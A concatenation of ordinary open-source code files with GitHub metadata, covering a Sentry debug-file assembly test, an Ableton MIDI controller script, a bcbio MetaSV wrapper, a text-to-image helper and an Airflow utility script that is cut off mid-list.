# The 32 dimensions case takes forever to run!!
# theSuite.addTest(unittest.makeSuite(Basic32DTestCase))
return theSuite
if __name__ == '__main__':
common.parse_argv(sys.argv)
common.print_versions()
unittest.main(defaultTest='suite')
| {
"content_hash": "8c4e9e05f13c824c5f5cc390f5d31558",
"timestamp": "",
"source": "github",
"line_count": 1407,
"max_line_length": 79,
"avg_line_length": 36.42786069651741,
"alnum_prop": 0.5587661450813595,
"repo_name": "jack-pappas/PyTables",
"id": "68646870ece478ecdb51f37614c331b0206bda7a",
"size": "51279",
"binary": false,
"copies": "6",
"ref": "refs/heads/develop",
"path": "tables/tests/test_numpy.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "901914"
},
{
"name": "C++",
"bytes": "97381"
},
{
"name": "CSS",
"bytes": "2717"
},
{
"name": "Gnuplot",
"bytes": "2104"
},
{
"name": "JavaScript",
"bytes": "3491"
},
{
"name": "Makefile",
"bytes": "11351"
},
{
"name": "Objective-C",
"bytes": "31966"
},
{
"name": "Python",
"bytes": "3594491"
},
{
"name": "Shell",
"bytes": "23613"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from mock import patch
from hashlib import sha1
from django.core.urlresolvers import reverse
from django.core.files.base import ContentFile
from sentry.models import ApiToken, FileBlob, File, FileBlobIndex, FileBlobOwner
from sentry.models.debugfile import ProjectDebugFile
from sentry.testutils import APITestCase
from sentry.tasks.assemble import (
assemble_dif,
assemble_file,
get_assemble_status,
set_assemble_status,
AssembleTask,
ChunkFileState,
)
class DifAssembleEndpoint(APITestCase):
def setUp(self):
self.organization = self.create_organization(owner=self.user)
self.token = ApiToken.objects.create(user=self.user, scope_list=["project:write"])
self.team = self.create_team(organization=self.organization)
self.project = self.create_project(
teams=[self.team], organization=self.organization, name="foo"
)
self.url = reverse(
"sentry-api-0-assemble-dif-files", args=[self.organization.slug, self.project.slug]
)
def test_assemble_json_schema(self):
response = self.client.post(
self.url, data={"lol": "test"}, HTTP_AUTHORIZATION=u"Bearer {}".format(self.token.token)
)
assert response.status_code == 400, response.content
checksum = sha1("1").hexdigest()
response = self.client.post(
self.url,
data={checksum: "test"},
HTTP_AUTHORIZATION=u"Bearer {}".format(self.token.token),
)
assert response.status_code == 400, response.content
response = self.client.post(
self.url, data={checksum: {}}, HTTP_AUTHORIZATION=u"Bearer {}".format(self.token.token)
)
assert response.status_code == 400, response.content
response = self.client.post(
self.url,
data={checksum: {"name": "dif", "chunks": []}},
HTTP_AUTHORIZATION=u"Bearer {}".format(self.token.token),
)
assert response.status_code == 200, response.content
assert response.data[checksum]["state"] == ChunkFileState.NOT_FOUND
def test_assemble_check(self):
content = "foo bar".encode("utf-8")
fileobj = ContentFile(content)
file1 = File.objects.create(name="baz.dSYM", type="default", size=7)
file1.putfile(fileobj, 3)
checksum = sha1(content).hexdigest()
blobs = FileBlob.objects.all()
checksums = []
for blob in blobs:
checksums.append(blob.checksum)
# Request to see of file is there
# file exists but we have no overship for the chunks
response = self.client.post(
self.url,
data={checksum: {"name": "dif", "chunks": checksums}},
HTTP_AUTHORIZATION=u"Bearer {}".format(self.token.token),
)
assert response.status_code == 200, response.content
assert response.data[checksum]["state"] == ChunkFileState.NOT_FOUND
assert set(response.data[checksum]["missingChunks"]) == set(checksums)
# Now we add ownership to the blob
blobs = FileBlob.objects.all()
for blob in blobs:
FileBlobOwner.objects.create(blob=blob, organization=self.organization)
# The request will start the job to assemble the file
response = self.client.post(
self.url,
data={checksum: {"name": "dif", "chunks": checksums}},
HTTP_AUTHORIZATION=u"Bearer {}".format(self.token.token),
)
assert response.status_code == 200, response.content
assert response.data[checksum]["state"] == ChunkFileState.CREATED
assert response.data[checksum]["missingChunks"] == []
# Finally, we simulate a successful job
ProjectDebugFile.objects.create(
file=file1,
object_name="baz.dSYM",
cpu_name="x86_64",
project=self.project,
debug_id="df449af8-0dcd-4320-9943-ec192134d593",
code_id="DF449AF80DCD43209943EC192134D593",
)
set_assemble_status(AssembleTask.DIF, self.project.id, checksum, None)
# Request now tells us that everything is alright
response = self.client.post(
self.url,
data={checksum: {"name": "dif", "chunks": checksums}},
HTTP_AUTHORIZATION=u"Bearer {}".format(self.token.token),
)
assert response.status_code == 200, response.content
assert response.data[checksum]["state"] == ChunkFileState.OK
assert response.data[checksum]["missingChunks"] == []
not_found_checksum = sha1("1").hexdigest()
response = self.client.post(
self.url,
data={not_found_checksum: {"name": "dif", "chunks": [not_found_checksum]}},
HTTP_AUTHORIZATION=u"Bearer {}".format(self.token.token),
)
assert response.status_code == 200, response.content
assert response.data[not_found_checksum]["state"] == ChunkFileState.NOT_FOUND
assert set(response.data[not_found_checksum]["missingChunks"]) == set([not_found_checksum])
@patch("sentry.tasks.assemble.assemble_dif")
def test_assemble(self, mock_assemble_dif):
content1 = "foo".encode("utf-8")
fileobj1 = ContentFile(content1)
checksum1 = sha1(content1).hexdigest()
content2 = "bar".encode("utf-8")
fileobj2 = ContentFile(content2)
checksum2 = sha1(content2).hexdigest()
content3 = "baz".encode("utf-8")
fileobj3 = ContentFile(content3)
checksum3 = sha1(content3).hexdigest()
total_checksum = sha1(content2 + content1 + content3).hexdigest()
# The order here is on purpose because we check for the order of checksums
blob1 = FileBlob.from_file(fileobj1)
FileBlobOwner.objects.get_or_create(organization=self.organization, blob=blob1)
blob3 = FileBlob.from_file(fileobj3)
FileBlobOwner.objects.get_or_create(organization=self.organization, blob=blob3)
blob2 = FileBlob.from_file(fileobj2)
# we make a request now but we are missing ownership for chunk 2
response = self.client.post(
self.url,
data={total_checksum: {"name": "test", "chunks": [checksum2, checksum1, checksum3]}},
HTTP_AUTHORIZATION=u"Bearer {}".format(self.token.token),
)
assert response.status_code == 200, response.content
assert response.data[total_checksum]["state"] == ChunkFileState.NOT_FOUND
assert response.data[total_checksum]["missingChunks"] == [checksum2]
# we add ownership to chunk 2
FileBlobOwner.objects.get_or_create(organization=self.organization, blob=blob2)
# new request, ownership for all chunks is there but file does not exist yet
response = self.client.post(
self.url,
data={total_checksum: {"name": "test", "chunks": [checksum2, checksum1, checksum3]}},
HTTP_AUTHORIZATION=u"Bearer {}".format(self.token.token),
)
assert response.status_code == 200, response.content
assert response.data[total_checksum]["state"] == ChunkFileState.CREATED
assert response.data[total_checksum]["missingChunks"] == []
chunks = [checksum2, checksum1, checksum3]
mock_assemble_dif.apply_async.assert_called_once_with(
kwargs={
"project_id": self.project.id,
"name": "test",
"chunks": chunks,
"checksum": total_checksum,
"debug_id": None,
}
)
file = assemble_file(
AssembleTask.DIF, self.project, "test", total_checksum, chunks, "project.dif"
)[0]
status, _ = get_assemble_status(AssembleTask.DIF, self.project.id, total_checksum)
assert status != ChunkFileState.ERROR
assert file.checksum == total_checksum
file_blob_index = FileBlobIndex.objects.all()
assert len(file_blob_index) == 3
def test_dif_response(self):
sym_file = self.load_fixture("crash.sym")
blob1 = FileBlob.from_file(ContentFile(sym_file))
total_checksum = sha1(sym_file).hexdigest()
chunks = [blob1.checksum]
assemble_dif(
project_id=self.project.id, name="crash.sym", checksum=total_checksum, chunks=chunks
)
response = self.client.post(
self.url,
data={total_checksum: {"name": "test.sym", "chunks": chunks}},
HTTP_AUTHORIZATION=u"Bearer {}".format(self.token.token),
)
assert response.status_code == 200, response.content
assert response.data[total_checksum]["state"] == ChunkFileState.OK
assert response.data[total_checksum]["dif"]["cpuName"] == "x86_64"
assert (
response.data[total_checksum]["dif"]["uuid"] == "67e9247c-814e-392b-a027-dbde6748fcbf"
)
def test_dif_error_response(self):
sym_file = "fail"
blob1 = FileBlob.from_file(ContentFile(sym_file))
total_checksum = sha1(sym_file).hexdigest()
chunks = [blob1.checksum]
assemble_dif(
project_id=self.project.id, name="test.sym", checksum=total_checksum, chunks=chunks
)
response = self.client.post(
self.url,
data={total_checksum: {"name": "test.sym", "chunks": []}},
HTTP_AUTHORIZATION=u"Bearer {}".format(self.token.token),
)
assert response.status_code == 200, response.content
assert response.data[total_checksum]["state"] == ChunkFileState.ERROR
assert response.data[total_checksum]["detail"].startswith(
"Unsupported debug information file"
)
| {
"content_hash": "1bd2a6ed596516385e7499728f296994",
"timestamp": "",
"source": "github",
"line_count": 245,
"max_line_length": 100,
"avg_line_length": 39.97551020408163,
"alnum_prop": 0.6197672044108637,
"repo_name": "mvaled/sentry",
"id": "27f65e2063d9517192cde9750f2a343606e9d2e7",
"size": "9794",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/sentry/api/endpoints/test_dif_assemble.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "226439"
},
{
"name": "Dockerfile",
"bytes": "6431"
},
{
"name": "HTML",
"bytes": "173429"
},
{
"name": "JavaScript",
"bytes": "9314175"
},
{
"name": "Lua",
"bytes": "65885"
},
{
"name": "Makefile",
"bytes": "9225"
},
{
"name": "Python",
"bytes": "50385401"
},
{
"name": "Ruby",
"bytes": "168"
},
{
"name": "Shell",
"bytes": "5685"
},
{
"name": "TypeScript",
"bytes": "773664"
}
],
"symlink_target": ""
} |
import math
import MIDI
from Control import Control, ignore_cc_zero
from mappings import mappings
class GlobalControl(Control):
def __init__(self, c_instance, selected_track_controller):
Control.__init__(self, c_instance, selected_track_controller)
self.show_message('Global controls initialized')
self.track_buffer = 0
self.scene_buffer = 0
self.song.view.add_selected_track_listener(self.on_track_selected)
def get_midi_bindings(self):
return (
("scrub_by", self.scrub_by),
("midi_recording_quantization", self.midi_recording_quantization),
("play", self.play),
("pause", self.pause),
("scrub_by", self.scrub_by),
("stop", self.stop),
("overdub_on", self.toggle_overdub),
("overdub_off", self.toggle_overdub),
("metronome_on", self.toggle_metronome),
("metronome_off", self.toggle_metronome),
("undo", self.undo),
("redo", self.redo),
("session_automation_rec_on", self.toggle_session_automation_record),
("session_automation_rec_off", self.toggle_session_automation_record),
("fire_next_scene", self.fire_next_scene),
# Session
("scroll_tracks", self.scroll_tracks),
("scroll_scenes", self.scroll_scenes),
("prev_track", self.select_prev_track),
("next_track", self.select_next_track),
# Device
("macro_1", lambda value, mode, status: self.set_device_param(1, value)),
("macro_2", lambda value, mode, status: self.set_device_param(2, value)),
("macro_3", lambda value, mode, status: self.set_device_param(3, value)),
("macro_4", lambda value, mode, status: self.set_device_param(4, value)),
("macro_5", lambda value, mode, status: self.set_device_param(5, value)),
("macro_6", lambda value, mode, status: self.set_device_param(6, value)),
("macro_7", lambda value, mode, status: self.set_device_param(7, value)),
("macro_8", lambda value, mode, status: self.set_device_param(8, value)),
# Clip
("delete_clip", self.delete_clip),
("duplicate_clip", self.duplicate_clip),
("double_clip", self.double_clip),
("create_clip", self.create_clip),
# Track
("volume", self.set_volume),
("pan", self.set_pan),
("send_a", lambda value, mode, status: self.set_send(0, value)),
("send_b", lambda value, mode, status: self.set_send(1, value)),
("send_c", lambda value, mode, status: self.set_send(2, value)),
("send_d", lambda value, mode, status: self.set_send(3, value)),
("arm", self.toggle_arm),
("unarm", self.toggle_arm),
("solo", self.toggle_solo),
("unsolo", self.toggle_solo),
("mute", self.toggle_mute),
("unmute", self.toggle_mute),
)
def scrub_by(self, value, mode, status):
self.song.scrub_by(value)
@ignore_cc_zero
def play(self, value, mode, status):
if self.song.current_song_time == 0:
self.song.start_playing()
else:
self.song.continue_playing()
@ignore_cc_zero
def pause(self, value, mode, status):
self.song.stop_playing()
@ignore_cc_zero
def stop(self, value, mode, status):
self.song.stop_playing()
self.c_instance.send_midi((128, mappings["play"].key, 0))
@ignore_cc_zero
def toggle_overdub(self, value, mode, status):
self.song.overdub = not self.song.overdub
@ignore_cc_zero
def toggle_metronome(self, value, mode, status):
self.song.metronome = bool(value)
@ignore_cc_zero
def undo(self, value, mode, status):
self.song.undo()
@ignore_cc_zero
def redo(self, value, mode, status):
self.song.redo()
def toggle_session_automation_record(self, value, mode, status):
self.song.session_automation_record = not self.song.session_automation_record
def scroll_tracks(self, value, *args):
# change track on every 5th value change for ease of use
# if the knob is turned to the other side than before, reset:
if math.copysign(1, self.track_buffer) != math.copysign(1, value):
self.track_buffer = 0
self.track_buffer += value
# if we reached the threshold, change track using the value (+/- 1) and reset
if abs(self.track_buffer) == 5:
self.song.view.selected_track = self.get_track_by_delta(value)
self.track_buffer = 0
def select_next_track(self, *args):
self.song.view.selected_track = self.get_track_by_delta(1)
def select_prev_track(self, *args):
self.song.view.selected_track = self.get_track_by_delta(-1)
def get_track_by_delta(self, delta):
tracks = self.song.tracks + self.song.return_tracks + (self.song.master_track,)
current_index = tracks.index(self.song.view.selected_track)
new_index = max(0, min(current_index + delta, len(tracks) - 1))
return tracks[new_index]
def scroll_scenes(self, value, *args):
# see scroll_tracks()
if math.copysign(1, self.scene_buffer) != math.copysign(1, value):
self.scene_buffer = 0
self.scene_buffer += value
if abs(self.scene_buffer) == 5:
self.song.view.selected_scene = self.get_scene_by_delta(value)
self.scene_buffer = 0
def get_scene_by_delta(self, delta):
scene = self.song.view.selected_scene
scenes = self.song.scenes
current_index = list(scenes).index(scene)
new_index = max(0, min(current_index + delta, len(scenes) - 1))
return scenes[new_index]
def delete_clip(self, value, mode, status):
slot = self.song.view.highlighted_clip_slot
if slot is not None and slot.has_clip:
slot.delete_clip()
def duplicate_clip(self, value, mode, status):
slot = self.song.view.highlighted_clip_slot
if slot.has_clip:
track = self.song.view.selected_track
next = track.duplicate_clip_slot(list(track.clip_slots).index(slot))
self.song.view.highlighted_clip_slot = track.clip_slots[next]
def double_clip(self, value, mode, status):
slot = self.song.view.highlighted_clip_slot
track = self.song.view.selected_track
if slot.has_clip:
slot_index = track.playing_slot_index
if slot_index >= 0 and track.clip_slots[slot_index].has_clip:
track.clip_slots[slot_index].clip.duplicate_loop()
def create_clip(self, value, mode, status):
# TODO: show message if not a MIDI track
slot = self.song.view.highlighted_clip_slot
slot.create_clip(4)
@ignore_cc_zero
def toggle_arm(self, value, mode, status):
self.song.view.selected_track.arm = bool(value)
@ignore_cc_zero
def toggle_mute(self, value, mode, status):
self.song.view.selected_track.mute = bool(value)
@ignore_cc_zero
def toggle_solo(self, value, mode, status):
self.song.view.selected_track.solo = bool(value)
def set_volume(self, value, mode, status):
current_value = self.song.view.selected_track.mixer_device.volume.value
self.song.view.selected_track.mixer_device.volume.value = max(
0.0,
min(1.0, current_value + (value / 200.0))
)
def set_pan(self, value, mode, status):
current_value = self.song.view.selected_track.mixer_device.panning.value
self.song.view.selected_track.mixer_device.panning.value = max(
-1.0,
min(1.0, current_value + (value / 100.0))
)
def set_send(self, i, value):
if i >= len(self.song.view.selected_track.mixer_device.sends):
return
param = self.song.view.selected_track.mixer_device.sends[i]
if param:
param.value = max(0.0, min(1.0, param.value + (value / 100.0)))
def set_device_param(self, i, value):
device = self.song.view.selected_track.view.selected_device
if not device:
return
param = device.parameters[i]
if not param:
return
param_range = param.max - param.min
param.value = max(param.min, min(param.max, param.value + param_range * value / 127.0))
def scrub_by(self, value, mode, status):
self.song.scrub_by(value)
@ignore_cc_zero
def midi_recording_quantization(self, value, mode, status):
q_labels = ["None", "1/4", "1/8", "1/8T", "1/8", "1/8T", "1/16", "1/16T", "1/16", "1/16T", "1/32"]
self.song.midi_recording_quantization = self._get_quantization(value, mode, status)
self.show_message(
"MIDI recording quantization: %s" %
q_labels[self.song.midi_recording_quantization]
)
def _get_quantization(self, value, mode, status):
# 0: None
# 1: 1/4
# 2: 1/8
# 3: 1/8T
# 4: 1/8 + 1/8T
# 5: 1/16
# 6: 1/16T
# 7: 1/16 + 1/16T
# 8: 1/32
next_index = range(9).index(self.song.midi_recording_quantization) + (value / abs(value))
return min(max(0, next_index), 8)
@ignore_cc_zero
def fire_next_scene(self, value, mode, status):
scene = self.get_scene_by_delta(1)
scene.fire()
self.song.view.selected_scene = scene
def on_track_selected(self):
# (note on: 144 | note off: 128, note, velocity)
def _build_midi_msg(status):
if status:
msg = 144
vel = 1
else:
msg = 128
vel = 0
return msg, vel
track = self.song.view.selected_track
# TODO: check if send or master track
msg, vel = _build_midi_msg(track.arm)
self.c_instance.send_midi((msg, mappings["arm"].key, vel))
msg, vel = _build_midi_msg(track.mute)
self.c_instance.send_midi((msg, mappings["mute"].key, vel))
msg, vel = _build_midi_msg(track.solo)
self.c_instance.send_midi((msg, mappings["solo"].key, vel))
if len(track.devices) > 0:
self.song.view.select_device(track.devices[0])
| {
"content_hash": "0d4f9355c3a6a73141277f4539419f45",
"timestamp": "",
"source": "github",
"line_count": 273,
"max_line_length": 106,
"avg_line_length": 38.282051282051285,
"alnum_prop": 0.5841546263515454,
"repo_name": "nandordevai/MPD218_TotalControl",
"id": "a7fd78103e9664c6eb3a9c0d9c744f627a4501d4",
"size": "10451",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "GlobalControl.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "16261"
}
],
"symlink_target": ""
} |
"""
Decorators which can be used for validating arguments passed into decorated functions
"""
from functools import wraps
from inspect import signature
def non_empty(*parameter_names):
"""
Enforces arguments to parameters passed in have len > 0
"""
def _decorator(f):
sig = signature(f)
# TODO - add validation that parameter names are in signature
@wraps(f)
def _inner(*args, **kwargs):
bindings = sig.bind(*args, **kwargs)
for parameter_name in parameter_names:
if not len(bindings.arguments[parameter_name]):
raise TypeError(
"Expected non-empty argument for parameter {}".format(
parameter_name
)
)
return f(*args, **kwargs)
return _inner
return _decorator
| {
"content_hash": "272e16b648c2f80dcd01936712aee936",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 85,
"avg_line_length": 28.870967741935484,
"alnum_prop": 0.5586592178770949,
"repo_name": "econ-ark/HARK",
"id": "792832abc180b3dc364c6e2d82b55e67d6a647b5",
"size": "895",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "HARK/validators.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "111"
},
{
"name": "Python",
"bytes": "1397750"
},
{
"name": "Shell",
"bytes": "350"
}
],
"symlink_target": ""
} |
"""Perform ensemble calling of structural variants using MetaSV.
https://github.com/chapmanb/metasv
http://dx.doi.org/10.1093/bioinformatics/btv204
"""
import os
import sys
from bcbio import utils
from bcbio.provenance import do
from bcbio.pipeline import datadict as dd
from bcbio.structural import shared
from bcbio.variation import effects, vfilter
MIN_CALLERS = 2
SUPPORTED = set(["manta", "lumpy", "cnvkit", "wham"])
def run(items):
"""Run MetaSV if we have enough supported callers, adding output to the set of calls.
"""
assert len(items) == 1, "Expect one input to MetaSV ensemble calling"
data = items[0]
work_dir = _sv_workdir(data)
out_file = os.path.join(work_dir, "variants.vcf.gz")
cmd = _get_cmd() + ["--sample", dd.get_sample_name(data), "--reference", dd.get_ref_file(data),
"--bam", dd.get_align_bam(data), "--outdir", work_dir]
methods = []
for call in data.get("sv", []):
if call["variantcaller"] in SUPPORTED and call["variantcaller"] not in methods:
methods.append(call["variantcaller"])
cmd += ["--%s_vcf" % call["variantcaller"], call.get("vcf_file", call["vrn_file"])]
if len(methods) >= MIN_CALLERS:
if not utils.file_exists(out_file):
tx_work_dir = utils.safe_makedir(os.path.join(work_dir, "raw"))
ins_stats = shared.calc_paired_insert_stats_save(dd.get_align_bam(data),
os.path.join(tx_work_dir, "insert-stats.yaml"))
cmd += ["--workdir", tx_work_dir, "--num_threads", str(dd.get_num_cores(data))]
cmd += ["--spades", utils.which("spades.py"), "--age", utils.which("age_align")]
cmd += ["--assembly_max_tools=1", "--assembly_pad=500"]
cmd += ["--boost_sc", "--isize_mean", ins_stats["mean"], "--isize_sd", ins_stats["std"]]
do.run(cmd, "Combine variant calls with MetaSV")
filters = ("(NUM_SVTOOLS = 1 && ABS(SVLEN)>50000) || "
"(NUM_SVTOOLS = 1 && ABS(SVLEN)<4000 && BA_FLANK_PERCENT>80) || "
"(NUM_SVTOOLS = 1 && ABS(SVLEN)<4000 && BA_NUM_GOOD_REC=0) || "
"(ABS(SVLEN)<4000 && BA_NUM_GOOD_REC>2)")
filter_file = vfilter.hard_w_expression(out_file, filters,
data, name="ReassemblyStats", limit_regions=None)
effects_vcf, _ = effects.add_to_vcf(filter_file, data, "snpeff")
data["sv"].append({"variantcaller": "metasv",
"vrn_file": effects_vcf or filter_file})
return [data]
def _sv_workdir(data):
return utils.safe_makedir(os.path.join(data["dirs"]["work"], "structural",
dd.get_sample_name(data), "metasv"))
def _get_cmd():
return [sys.executable, os.path.join(os.path.dirname(sys.executable), "run_metasv.py")]
| {
"content_hash": "506fdc20cd3b6c6275d706b5de842dea",
"timestamp": "",
"source": "github",
"line_count": 58,
"max_line_length": 108,
"avg_line_length": 50.293103448275865,
"alnum_prop": 0.5779910867329449,
"repo_name": "lpantano/bcbio-nextgen",
"id": "95ce143db71ab609a825a6ee5f8a1a0c94e04dda",
"size": "2917",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "bcbio/structural/metasv.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1553199"
},
{
"name": "Ruby",
"bytes": "624"
},
{
"name": "Shell",
"bytes": "14377"
}
],
"symlink_target": ""
} |
import string
import os
import numpy
from scipy import io as spio
# This code is from:
# http://stackoverflow.com/questions/7008608/
# scipy-io-loadmat-nested-structures-i-e-dictionaries
def loadmat(filename):
'''This function should be called instead of direct spio.loadmat
as it cures the problem of not properly recovering python
dictionaries from mat files. It calls the function check keys to
cure all entries which are still mat-objects.'''
data = spio.loadmat(filename, struct_as_record=False, squeeze_me=True)
return _check_keys(data)
def _check_keys(d):
'''Checks if entries in dictionary are mat-objects. If yes todict
is called to change them to nested dictionaries.'''
for key in d:
if isinstance(d[key], spio.matlab.mio5_params.mat_struct):
d[key] = _todict(d[key])
return d
def _todict(matobj):
'''A recursive function which constructs from matobjects nested
dictionaries.'''
dict = {}
for strg in matobj._fieldnames:
elem = matobj.__dict__[strg]
if isinstance(elem, spio.matlab.mio5_params.mat_struct):
dict[strg] = _todict(elem)
elif isinstance(elem, numpy.ndarray):
dict[strg] = elem.tolist()
else:
dict[strg] = elem
return dict
if __name__ == "__main__":
mat = loadmat(os.environ['MAKANI_HOME']
+ '/database/m600/M600_20130810.mat')
mat['mat'] = mat['sampleWing']
f = open(os.environ['MAKANI_HOME'] + '/lib/datatools/sys_params.txt', 'r')
sys_params_template = f.read()
f.close()
f = open(os.environ['MAKANI_HOME'] + '/base/m600_sys_params.py', 'w')
f.write(sys_params_template.format(**mat))
f.close()
| {
"content_hash": "5a0e4f331af07c2b670bf42cfff5c3bf",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 78,
"avg_line_length": 32.01851851851852,
"alnum_prop": 0.6460381723539619,
"repo_name": "google/makani",
"id": "b4c89df5a822cd4239ca09aa0d45a55362e205bf",
"size": "2337",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/datatools/mat2csim.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "119408"
},
{
"name": "C",
"bytes": "20174258"
},
{
"name": "C++",
"bytes": "30512322"
},
{
"name": "CSS",
"bytes": "8921"
},
{
"name": "Dockerfile",
"bytes": "1381"
},
{
"name": "Emacs Lisp",
"bytes": "1134"
},
{
"name": "HTML",
"bytes": "65745"
},
{
"name": "Java",
"bytes": "1558475"
},
{
"name": "JavaScript",
"bytes": "130727"
},
{
"name": "Jupyter Notebook",
"bytes": "1154728"
},
{
"name": "MATLAB",
"bytes": "1026162"
},
{
"name": "Makefile",
"bytes": "2798"
},
{
"name": "Objective-C",
"bytes": "62972"
},
{
"name": "Perl",
"bytes": "870724"
},
{
"name": "Python",
"bytes": "5552781"
},
{
"name": "RPC",
"bytes": "195736"
},
{
"name": "Roff",
"bytes": "2567875"
},
{
"name": "SWIG",
"bytes": "8663"
},
{
"name": "Shell",
"bytes": "297941"
},
{
"name": "Starlark",
"bytes": "462998"
},
{
"name": "Vim Script",
"bytes": "2281"
},
{
"name": "XC",
"bytes": "50398"
},
{
"name": "XS",
"bytes": "49289"
}
],
"symlink_target": ""
} |
from JumpScale.clients.racktivity.energyswitch.modelfactory.models.common.Power_0_0_5_29 import Model as ModelClass
class Model(ModelClass):
pass
| {
"content_hash": "90acd304af908f55b0253054a5120e28",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 115,
"avg_line_length": 30.4,
"alnum_prop": 0.8092105263157895,
"repo_name": "Jumpscale/jumpscale_core8",
"id": "2e062511f1e3233b2b6a3da354bec4f4038a76e0",
"size": "152",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "lib/JumpScale/clients/racktivity/energyswitch/modelfactory/models/RTF0029/Power_0_0_5_29.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "1113"
},
{
"name": "Cap'n Proto",
"bytes": "9033"
},
{
"name": "Lua",
"bytes": "12538"
},
{
"name": "Python",
"bytes": "4343122"
},
{
"name": "Shell",
"bytes": "7091"
}
],
"symlink_target": ""
} |
from io import BytesIO
import PIL
from PIL import ImageFont
from PIL import Image
from PIL import ImageDraw
def text_to_png(text, color = "#000", bgcolor = "#FFF", fontfullpath = None, fontsize = 13, leftpadding = 3, rightpadding = 3, width = 500):
REPLACEMENT_CHARACTER = 'nlnlnl'
NEWLINE_REPLACEMENT_STRING = ' ' + REPLACEMENT_CHARACTER + ' '
font = ImageFont.load_default() if fontfullpath == None else ImageFont.truetype(fontfullpath, fontsize)
text = text.replace('\n', NEWLINE_REPLACEMENT_STRING)
lines = []
line = ""
for word in text.split():
if word == REPLACEMENT_CHARACTER: #give a blank line
lines.append( line[1:] ) #slice the white space in the begining of the line
line = ""
lines.append( "" ) #the blank line
elif font.getsize( line + ' ' + word )[0] <= (width - rightpadding - leftpadding):
line += ' ' + word
else: #start a new line
lines.append( line[1:] ) #slice the white space in the begining of the line
line = ""
#TODO: handle too long words at this point
line += ' ' + word #for now, assume no word alone can exceed the line width
if len(line) != 0:
lines.append( line[1:] ) #add the last line
line_height = font.getsize(text)[1]
img_height = line_height * (len(lines) + 1)
img = Image.new("RGBA", (width, img_height), bgcolor)
draw = ImageDraw.Draw(img)
y = 0
for line in lines:
draw.text( (leftpadding, y), line, color, font=font)
y += line_height
byte_io = BytesIO()
img.save(byte_io, 'PNG')
byte_io.seek(0)
return byte_io.read()
# #show time
# text2png(u"This is\na\ntest şğıöç zaa xd ve lorem hipster", 'test.png', fontfullpath = "font.ttf") | {
"content_hash": "f63fd327098c7f57c9f7026f2a937611",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 140,
"avg_line_length": 30.88679245283019,
"alnum_prop": 0.6707391569945022,
"repo_name": "fake-name/ReadableWebProxy",
"id": "46d2d755b3b9f9fe6899241d6abf9092c8a75b10",
"size": "1721",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Misc/txt_to_img.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "105811"
},
{
"name": "Dockerfile",
"bytes": "1178"
},
{
"name": "HTML",
"bytes": "119737"
},
{
"name": "JavaScript",
"bytes": "3006524"
},
{
"name": "Jupyter Notebook",
"bytes": "148075"
},
{
"name": "Mako",
"bytes": "1454"
},
{
"name": "Python",
"bytes": "5264346"
},
{
"name": "Shell",
"bytes": "1059"
}
],
"symlink_target": ""
} |
from __future__ import annotations
import ast
import os
from collections import defaultdict
from functools import lru_cache
from pathlib import Path
from typing import NamedTuple
from jinja2 import BaseLoader, Environment
from rich.console import Console
if __name__ not in ("__main__", "__mp_main__"):
raise SystemExit(
"This file is intended to be executed as an executable program. You cannot use it as a module_path."
f"To run this script, run the ./{__file__} command [FILE] ..."
)
AIRFLOW_SOURCES_ROOT = Path(__file__).parents[2].resolve()
CONTRIB_DIR = AIRFLOW_SOURCES_ROOT / "airflow" / "contrib"
@lru_cache(maxsize=None)
def black_mode():
from black import Mode, parse_pyproject_toml, target_version_option_callback
config = parse_pyproject_toml(os.path.join(AIRFLOW_SOURCES_ROOT, "pyproject.toml"))
target_versions = set(
target_version_option_callback(None, None, tuple(config.get('target_version', ()))),
)
return Mode(
target_versions=target_versions,
line_length=config.get('line_length', Mode.line_length),
is_pyi=bool(config.get('is_pyi', Mode.is_pyi)),
string_normalization=not bool(config.get('skip_string_normalization', not Mode.string_normalization)),
experimental_string_processing=bool(
config.get('experimental_string_processing', Mode.experimental_string_processing)
),
)
def black_format(content) -> str:
from black import format_str
return format_str(content, mode=black_mode())
class Import(NamedTuple):
module_path: str
name: str
alias: str
class ImportedClass(NamedTuple):
module_path: str
name: str
def get_imports(path: Path):
root = ast.parse(path.read_text())
imports: dict[str, ImportedClass] = {}
for node in ast.iter_child_nodes(root):
if isinstance(node, ast.Import):
module_array: list[str] = []
elif isinstance(node, ast.ImportFrom) and node.module:
module_array = node.module.split('.')
elif isinstance(node, ast.ClassDef):
for base in node.bases:
res = imports.get(base.id) # type: ignore[attr-defined]
if res:
yield Import(module_path=res.module_path, name=res.name, alias=node.name)
continue
else:
continue
for n in node.names: # type: ignore[attr-defined]
imported_as = n.asname if n.asname else n.name
module_path = ".".join(module_array)
imports[imported_as] = ImportedClass(module_path=module_path, name=n.name)
yield Import(module_path, n.name, imported_as)
DEPRECATED_CLASSES_TEMPLATE = """
__deprecated_classes = {
{%- for module_path, package_imports in package_imports.items() %}
'{{module_path}}': {
{%- for import_item in package_imports %}
'{{import_item.alias}}': '{{import_item.module_path}}.{{import_item.name}}',
{%- endfor %}
},
{%- endfor %}
}
"""
DEPRECATED_MODULES = [
'airflow/hooks/base_hook.py',
'airflow/hooks/dbapi_hook.py',
'airflow/hooks/docker_hook.py',
'airflow/hooks/druid_hook.py',
'airflow/hooks/hdfs_hook.py',
